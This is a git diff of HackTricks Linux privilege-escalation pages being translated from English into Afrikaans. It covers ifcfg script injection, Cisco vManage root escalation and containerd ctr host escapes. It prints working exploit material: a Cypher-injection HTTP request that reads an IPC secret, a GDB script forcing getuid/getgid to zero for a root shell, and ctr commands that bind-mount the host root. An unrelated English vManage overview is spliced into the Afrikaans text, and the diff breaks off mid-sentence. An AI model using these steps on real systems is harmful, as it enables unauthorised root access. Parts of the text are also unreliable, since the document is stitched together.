Dit beteken dat **alles na die eerste leë spasie as root uitgevoer word**. +Byvoorbeeld: _/etc/sysconfig/network-scripts/ifcfg-1337_ ```bash NAME=Network /bin/id ONBOOT=yes DEVICE=eth0 ``` +(_Merk die leë spasie tussen Network en /bin/id_) -(_Note the blank space between Network and /bin/id_) +### **init, init.d, systemd, en rc.d** -### **init, init.d, systemd, and rc.d** +Die gids `/etc/init.d` is die tuiste van **skripsies** vir System V init (SysVinit), die **klassieke Linux-diensbestuurstelsel**. Dit sluit skripsies in om dienste te `begin`, `stop`, `herlaai`, en soms `herlaai`. Hierdie kan direk uitgevoer word of deur simboliese skakels in `/etc/rc?.d/` gevind word. 'n Alternatiewe pad in Redhat-stelsels is `/etc/rc.d/init.d`. -The directory `/etc/init.d` is home to **scripts** for System V init (SysVinit), the **classic Linux service management system**. It includes scripts to `start`, `stop`, `restart`, and sometimes `reload` services. These can be executed directly or through symbolic links found in `/etc/rc?.d/`. An alternative path in Redhat systems is `/etc/rc.d/init.d`. +Aan die ander kant word `/etc/init` geassosieer met **Upstart**, 'n nuwer **diensbestuurstelsel** wat deur Ubuntu bekendgestel is en konfigurasie lêers vir diensbestuurstake gebruik. Ten spyte van die oorgang na Upstart, word SysVinit-skripsies steeds gebruik saam met Upstart-konfigurasies as gevolg van 'n verenigbaarheidslaag in Upstart. -On the other hand, `/etc/init` is associated with **Upstart**, a newer **service management** introduced by Ubuntu, using configuration files for service management tasks. Despite the transition to Upstart, SysVinit scripts are still utilized alongside Upstart configurations due to a compatibility layer in Upstart. +**systemd** tree na vore as 'n moderne inisialisering en diensbestuurder en bied gevorderde funksies soos aanvraaggedrewe daemonbegin, outomatiese bergbestuur en stelseltoestand-snapshots. Dit organiseer lêers in `/usr/lib/systemd/` vir verspreidingspakette en `/etc/systemd/system/` vir administratiewe wysigings, wat die stelseladministrasieproses stroomlyn. -**systemd** emerges as a modern initialization and service manager, offering advanced features such as on-demand daemon starting, automount management, and system state snapshots. It organizes files into `/usr/lib/systemd/` for distribution packages and `/etc/systemd/system/` for administrator modifications, streamlining the system administration process. +## Ander Truuks -## Other Tricks - -### NFS Privilege escalation +### NFS Privilege-escalation {% content-ref url="nfs-no_root_squash-misconfiguration-pe.md" %} [nfs-no\_root\_squash-misconfiguration-pe.md](nfs-no\_root\_squash-misconfiguration-pe.md) {% endcontent-ref %} -### Escaping from restricted Shells +### Ontsnapping uit beperkte Skille {% content-ref url="escaping-from-limited-bash.md" %} [escaping-from-limited-bash.md](escaping-from-limited-bash.md) @@ -1633,31 +1724,31 @@ On the other hand, `/etc/init` is associated with **Upstart**, a newer **service [cisco-vmanage.md](cisco-vmanage.md) {% endcontent-ref %} -## Kernel Security Protections +## Kernel Sekuriteitsbeskerming * [https://github.com/a13xp0p0v/kconfig-hardened-check](https://github.com/a13xp0p0v/kconfig-hardened-check) * [https://github.com/a13xp0p0v/linux-kernel-defence-map](https://github.com/a13xp0p0v/linux-kernel-defence-map) -## More help +## Meer hulp -[Static impacket binaries](https://github.com/ropnop/impacket\_static\_binaries) +[Statiese impacket binêre lêers](https://github.com/ropnop/impacket\_static\_binaries) -## Linux/Unix Privesc Tools +## Linux/Unix Privesc-hulpmiddels -### **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) +### **Die beste hulpmiddel om te soek na Linux plaaslike voorregverhogingsvektore:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) -**LinEnum**: [https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum)(-t option)\ +**LinEnum**: [https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum)(-t opsie)\ **Enumy**: [https://github.com/luke-goddard/enumy](https://github.com/luke-goddard/enumy)\ **Unix Privesc Check:** [http://pentestmonkey.net/tools/audit/unix-privesc-check](http://pentestmonkey.net/tools/audit/unix-privesc-check)\ **Linux Priv Checker:** [www.securitysift.com/download/linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py)\ **BeeRoot:** [https://github.com/AlessandroZ/BeRoot/tree/master/Linux](https://github.com/AlessandroZ/BeRoot/tree/master/Linux)\ -**Kernelpop:** Enumerate kernel vulns ins linux and MAC [https://github.com/spencerdodd/kernelpop](https://github.com/spencerdodd/kernelpop)\ +**Kernelpop:** Enumereer kernelkwetsbaarhede in Linux en MAC [https://github.com/spencerdodd/kernelpop](https://github.com/spencerdodd/kernelpop)\ **Mestaploit:** _**multi/recon/local\_exploit\_suggester**_\ **Linux Exploit Suggester:** [https://github.com/mzet-/linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester)\ -**EvilAbigail (physical access):** [https://github.com/GDSSecurity/EvilAbigail](https://github.com/GDSSecurity/EvilAbigail)\ -**Recopilation of more scripts**: [https://github.com/1N3/PrivEsc](https://github.com/1N3/PrivEsc) +**EvilAbigail (fisiese toegang):** [https://github.com/GDSSecurity/EvilAbigail](https://github.com/GDSSecurity/EvilAbigail)\ +**Versameling van meer skrips**: [https://github.com/1N3/PrivEsc](https://github.com/1N3/PrivEsc) -## References +## Verwysings * [https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)\ * [https://payatu.com/guide-linux-privilege-escalation/](https://payatu.com/guide-linux-privilege-escalation/)\ @@ -1679,14 +1770,11 @@ On the other hand, `/etc/init` is associated with **Upstart**, a newer **service
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RU diff --git a/linux-hardening/privilege-escalation/cisco-vmanage.md b/linux-hardening/privilege-escalation/cisco-vmanage.md index fb5112cb2..ccc49aca0 100644 --- a/linux-hardening/privilege-escalation/cisco-vmanage.md +++ b/linux-hardening/privilege-escalation/cisco-vmanage.md @@ -2,34 +2,31 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud)**.
-## Path 1 +## Pad 1 -(Example from [https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html](https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html)) - -After digging a little through some [documentation](http://66.218.245.39/doc/html/rn03re18.html) related to `confd` and the different binaries (accessible with an account on the Cisco website), we found that to authenticate the IPC socket, it uses a secret located in `/etc/confd/confd_ipc_secret`: +(Voorbeeld van [https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html](https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html)) +Nadat ons 'n bietjie deur 'n paar [dokumentasie](http://66.218.245.39/doc/html/rn03re18.html) gekrap het wat verband hou met `confd` en die verskillende binnerwerke (toeganklik met 'n rekening op die Cisco-webwerf), het ons gevind dat dit 'n geheim gebruik wat in `/etc/confd/confd_ipc_secret` geleë is om die IPC-aansluiting te verifieer: ``` -vmanage:~$ ls -al /etc/confd/confd_ipc_secret +vmanage:~$ ls -al /etc/confd/confd_ipc_secret -rw-r----- 1 vmanage vmanage 42 Mar 12 15:47 /etc/confd/confd_ipc_secret ``` - -Remember our Neo4j instance? It is running under the `vmanage` user's privileges, thus allowing us to retrieve the file using the previous vulnerability: - +Onthou ons Neo4j-instantie? Dit word uitgevoer onder die voorregte van die `vmanage`-gebruiker, wat ons in staat stel om die lêer te herwin deur gebruik te maak van die vorige kwesbaarheid: ``` GET /dataservice/group/devices?groupId=test\\\'<>\"test\\\\\")+RETURN+n+UNION+LOAD+CSV+FROM+\"file:///etc/confd/confd_ipc_secret\"+AS+n+RETURN+n+//+' HTTP/1.1 -Host: vmanage-XXXXXX.viptela.net +Host: vmanage-XXXXXX.viptela.net @@ -37,13 +34,11 @@ Host: vmanage-XXXXXX.viptela.net "data":[{"n":["3708798204-3215954596-439621029-1529380576"]}]} ``` - -The `confd_cli` program does not support command line arguments but calls `/usr/bin/confd_cli_user` with arguments. So, we could directly call `/usr/bin/confd_cli_user` with our own set of arguments. However it's not readable with our current privileges, so we have to retrieve it from the rootfs and copy it using scp, read the help, and use it to get the shell: - +Die `confd_cli` program ondersteun nie opdraglyn-argumente nie, maar roep `/usr/bin/confd_cli_user` aan met argumente. So, ons kan direk `/usr/bin/confd_cli_user` oproep met ons eie stel argumente. Tog is dit nie leesbaar met ons huidige bevoegdhede nie, so ons moet dit van die rootfs herwin en dit gebruik om dit met behulp van scp te kopieer, die hulp lees en dit gebruik om die skul te kry: ``` vManage:~$ echo -n "3708798204-3215954596-439621029-1529380576" > /tmp/ipc_secret -vManage:~$ export CONFD_IPC_ACCESS_FILE=/tmp/ipc_secret +vManage:~$ export CONFD_IPC_ACCESS_FILE=/tmp/ipc_secret vManage:~$ /tmp/confd_cli_user -U 0 -G 0 @@ -57,15 +52,13 @@ vManage:~# id uid=0(root) gid=0(root) groups=0(root) ``` +## Pad 2 -## Path 2 +(Voorbeeld van [https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77](https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77)) -(Example from [https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77](https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77)) - -The blog¹ by the synacktiv team described an elegant way to get a root shell, but the caveat is it requires getting a copy of the `/usr/bin/confd_cli_user` which is only readable by root. I found another way to escalate to root without such hassle. - -When I disassembled `/usr/bin/confd_cli` binary, I observed the following: +Die blog¹ deur die synacktiv-span het 'n elegante manier beskryf om 'n root-skulp te kry, maar die addertjie is dat dit 'n kopie van die `/usr/bin/confd_cli_user` vereis wat slegs deur root leesbaar is. Ek het 'n ander manier gevind om na root te eskaleer sonder so 'n gedoente. +Toe ek die `/usr/bin/confd_cli` binêre kode ontleed het, het ek die volgende waargeneem: ``` vmanage:~$ objdump -d /usr/bin/confd_cli … snipped … @@ -94,46 +87,63 @@ vmanage:~$ objdump -d /usr/bin/confd_cli 4016c4: e8 d7 f7 ff ff callq 400ea0 <*ABS*+0x32e9880f0b@plt> … snipped … ``` - -When I run “ps aux”, I observed the following (_note -g 100 -u 107_) - +Wanneer ek "ps aux" uitvoer, het ek die volgende waargeneem (_note -g 100 -u 107_) ``` -vmanage:~$ ps aux +vmanage:~$ ps aux … snipped … root 28644 0.0 0.0 8364 652 ? Ss 18:06 0:00 /usr/lib/confd/lib/core/confd/priv/cmdptywrapper -I 127.0.0.1 -p 4565 -i 1015 -H /home/neteng -N neteng -m 2232 -t xterm-256color -U 1358 -w 190 -h 43 -c /home/neteng -g 100 -u 1007 bash … snipped … ``` +Ek het vermoed dat die "confd\_cli" program die gebruikers-ID en groep-ID wat dit van die ingelogde gebruiker versamel het, aan die "cmdptywrapper" toepassing deurgee. -I hypothesized the “confd\_cli” program passes the user ID and group ID it collected from the logged in user to the “cmdptywrapper” application. +My eerste poging was om die "cmdptywrapper" direk uit te voer en dit te voorsien met `-g 0 -u 0`, maar dit het misluk. Dit blyk dat 'n lêerbeskrywer (-i 1015) êrens langs die pad geskep is en ek kan dit nie vervals nie. -My first attempt was to run the “cmdptywrapper” directly and supplying it with `-g 0 -u 0`, but it failed. It appears a file descriptor (-i 1015) was created somewhere along the way and I cannot fake it. +Soos genoem in synacktiv se blog (laaste voorbeeld), ondersteun die `confd_cli` program nie opdraglynargumente nie, maar ek kan dit beïnvloed met 'n debugger en gelukkig is GDB ingesluit op die stelsel. -As mentioned in synacktiv’s blog(last example), the `confd_cli` program does not support command line argument, but I can influence it with a debugger and fortunately GDB is included on the system. - -I created a GDB script where I forced the API `getuid` and `getgid` to return 0. Since I already have “vmanage” privilege through the deserialization RCE, I have permission to read the `/etc/confd/confd_ipc_secret` directly. +Ek het 'n GDB-skripsie geskep waar ek die API `getuid` en `getgid` gedwing het om 0 terug te gee. Aangesien ek reeds "vmanage"-bevoegdheid het deur die deserialisering RCE, het ek toestemming om die `/etc/confd/confd_ipc_secret` direk te lees. root.gdb: - ``` set environment USER=root define root - finish - set $rax=0 - continue +finish +set $rax=0 +continue end break getuid commands - root +root end break getgid commands - root +root end run ``` +# Cisco vManage -Console Output: +## Introduction +Cisco vManage is a cloud-based network management platform that provides centralized control and visibility for Cisco SD-WAN deployments. It allows network administrators to monitor and configure network devices, troubleshoot issues, and manage network policies. + +## Privilege Escalation + +Privilege escalation refers to the process of gaining higher levels of access or privileges on a system or network. In the context of Cisco vManage, privilege escalation can allow an attacker to gain administrative access to the platform, potentially compromising the entire SD-WAN deployment. + +## Exploiting Vulnerabilities + +To escalate privileges in Cisco vManage, an attacker can exploit vulnerabilities in the platform or its underlying components. This can include exploiting misconfigurations, weak passwords, or software vulnerabilities. + +## Mitigation + +To mitigate the risk of privilege escalation in Cisco vManage, it is important to follow security best practices. This includes: + +- Regularly updating the platform and its components with the latest security patches. +- Enforcing strong password policies and using multi-factor authentication. +- Implementing network segmentation to limit the impact of a potential compromise. +- Monitoring the platform for any suspicious activity or unauthorized access attempts. + +By following these best practices, organizations can reduce the risk of privilege escalation and enhance the security of their Cisco SD-WAN deployments. ``` vmanage:/tmp$ gdb -x root.gdb /usr/bin/confd_cli GNU gdb (GDB) 8.0.1 @@ -167,15 +177,14 @@ root uid=0(root) gid=0(root) groups=0(root) bash-4.4# ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
diff --git a/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md b/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md index da54bc183..240b0b24e 100644 --- a/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md +++ b/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md @@ -1,22 +1,22 @@ -# Containerd (ctr) Privilege Escalation +# Containerd (ctr) Voorregverhoging
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## Basic information +## Basiese inligting -Go to the following link to learn **what is containerd** and `ctr`: +Gaan na die volgende skakel om uit te vind **wat is containerd** en `ctr`: {% content-ref url="../../network-services-pentesting/2375-pentesting-docker.md" %} [2375-pentesting-docker.md](../../network-services-pentesting/2375-pentesting-docker.md) @@ -24,38 +24,30 @@ Go to the following link to learn **what is containerd** and `ctr`: ## PE 1 -if you find that a host contains the `ctr` command: - +As jy vind dat 'n gasheer die `ctr`-opdrag bevat: ```bash which ctr /usr/bin/ctr ``` - -You can list the images: - +Jy kan die beelde lys: ```bash ctr image list -REF TYPE DIGEST SIZE PLATFORMS LABELS -registry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json sha256:0565dfc4f13e1df6a2ba35e8ad549b7cb8ce6bccbc472ba69e3fe9326f186fe2 100.1 MiB linux/amd64 - -registry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 - +REF TYPE DIGEST SIZE PLATFORMS LABELS +registry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json sha256:0565dfc4f13e1df6a2ba35e8ad549b7cb8ce6bccbc472ba69e3fe9326f186fe2 100.1 MiB linux/amd64 - +registry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 - ``` - -And then **run one of those images mounting the host root folder to it**: - +En voer dan **een van daardie images uit de waarin die gasheer se hoofmap gekoppel word**: ```bash ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash ``` - ## PE 2 -Run a container privileged and escape from it.\ -You can run a privileged container as: - +Voer 'n bevoorregte houer uit en ontsnap daaruit.\ +Jy kan 'n bevoorregte houer uitvoer as: ```bash - ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash +ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash ``` - -Then you can use some of the techniques mentioned in the following page to **escape from it abusing privileged capabilities**: +Dan kan jy van sommige van die tegnieke gebruik maak wat genoem word op die volgende bladsy om daaruit te ontsnap deur bevoorregte vermoëns te misbruik: {% content-ref url="docker-security/" %} [docker-security](docker-security/) @@ -63,14 +55,14 @@ Then you can use some of the techniques mentioned in the following page to **esc
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
diff --git a/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md b/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md index fe6c1de8b..99c712f58 100644 --- a/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md +++ b/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md @@ -1,84 +1,79 @@ -# D-Bus Enumeration & Command Injection Privilege Escalation +# D-Bus Enumerasie & Opdraginspuiting Privilege Escalation
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## **GUI enumeration** +## **GUI enumerasie** -D-Bus is utilized as the inter-process communications (IPC) mediator in Ubuntu desktop environments. On Ubuntu, the concurrent operation of several message buses is observed: the system bus, primarily utilized by **privileged services to expose services relevant across the system**, and a session bus for each logged-in user, exposing services relevant only to that specific user. The focus here is primarily on the system bus due to its association with services running at higher privileges (e.g., root) as our objective is to elevate privileges. It is noted that D-Bus's architecture employs a 'router' per session bus, which is responsible for redirecting client messages to the appropriate services based on the address specified by the clients for the service they wish to communicate with. +D-Bus word gebruik as die interproseskommunikasie (IPC)-bemiddelaar in Ubuntu-desktopomgewings. Op Ubuntu word die gelyktydige werking van verskeie boodskapbusse waargeneem: die stelselbus, hoofsaaklik gebruik deur **bevoorregte dienste om dienste bloot te stel wat relevant is vir die hele stelsel**, en 'n sessiebus vir elke ingeteken gebruiker, wat slegs dienste blootstel wat slegs vir daardie spesifieke gebruiker relevant is. Die fokus hier is hoofsaaklik op die stelselbus as gevolg van sy assosiasie met dienste wat met hoër bevoegdhede (bv. root) loop, aangesien ons doel is om bevoegdhede te verhoog. Daar word opgemerk dat D-Bus se argitektuur 'n 'roeteerder' per sessiebus gebruik, wat verantwoordelik is vir die omleiding van kliëntboodskappe na die toepaslike dienste op grond van die adres wat deur die kliënte vir die diens waarmee hulle wil kommunikeer, gespesifiseer word. -Services on D-Bus are defined by the **objects** and **interfaces** they expose. Objects can be likened to class instances in standard OOP languages, with each instance uniquely identified by an **object path**. This path, akin to a filesystem path, uniquely identifies each object exposed by the service. A key interface for research purposes is the **org.freedesktop.DBus.Introspectable** interface, featuring a singular method, Introspect. This method returns an XML representation of the object's supported methods, signals, and properties, with a focus here on methods while omitting properties and signals. - -For communication with the D-Bus interface, two tools were employed: a CLI tool named **gdbus** for easy invocation of methods exposed by D-Bus in scripts, and [**D-Feet**](https://wiki.gnome.org/Apps/DFeet), a Python-based GUI tool designed to enumerate the services available on each bus and to display the objects contained within each service. +Dienste op D-Bus word gedefinieer deur die **voorwerpe** en **koppelvlakke** wat hulle blootstel. Voorwerpe kan vergelyk word met klasinstansies in standaard OOP-tale, waar elke instansie uniek geïdentifiseer word deur 'n **voorwerppad**. Hierdie pad, soortgelyk aan 'n lêerstelselpad, identifiseer elke voorwerp wat deur die diens blootgestel word. 'n 